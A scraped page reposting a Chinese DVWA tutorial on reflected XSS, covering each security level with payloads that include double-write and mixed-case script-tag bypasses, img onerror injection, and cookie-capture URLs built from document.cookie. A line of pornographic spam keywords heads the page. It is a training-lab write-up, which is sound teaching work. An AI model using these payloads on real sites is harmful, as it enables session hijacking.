日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

DVWA-XSS(Reflected) 全级别教程

發布時間:2023/12/14 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 DVWA-XSS(Reflected) 全级别教程 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

XSS(Reflected)

文章目錄

  • XSS(Reflected)
  • Low等級
    • 獲取cookie
  • Medium等級
    • 查看源碼
    • 利用雙寫繞過
    • 獲取cookie
    • 大小寫混淆繞過
    • 獲取cookie
  • High等級
    • 查看源碼
  • Impossible等級
    • 查看源碼

Low等級

查看源碼

可以看到,代碼直接引用了name參數,并沒有任何的過濾與檢查,存在明顯的XSS漏洞。
輸入<script>alert(/左小舟/)</script>,成功彈框

獲取cookie

<script>alert( 'http://192.168.0.107/cookie/?cookie='+document.cookie)</script>,彈窗成功

Medium等級

查看源碼

使用str_replace函數將輸入中的

利用雙寫繞過

<sc<script>ript>alert(/zzz/)</script>,成功彈框

獲取cookie

<sc<script>ript>alert('zwy-http:// 192.168.0.107/cookie/?cookie='+document.cookie)</script>,成功彈框


大小寫混淆繞過

<ScRipt>alert(/zzz/)</script>,成功彈框

獲取cookie

<ScRipt>alert('http:// 192.168.0.107/cookie/?cookie='+document.cookie)</script>,成功彈框

High等級

查看源碼

preg_replace() 函數用于正則表達式的搜索和替換,這使得雙寫繞過、大小寫混淆繞過(正則表達式中i表示不區分大小寫)不再有效。
通過img、body等標簽的事件或者iframe等標簽的src注入惡意的js代碼。
輸入<img src=1 onerror=alert(/zzz/)>,成功彈框

輸入<img src=1 onerror=alert('http://192.168.0.107/cookie/?cookie='+document.cookie)>,成功彈框

Impossible等級

查看源碼

可以看到,Impossible級別的代碼使用htmlspecialchars函數把預定義的字符&、”、 ’、<、>轉換為HTML實體,防止瀏覽器將其作為HTML元素。

總結

以上是生活随笔為你收集整理的DVWA-XSS(Reflected) 全级别教程的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。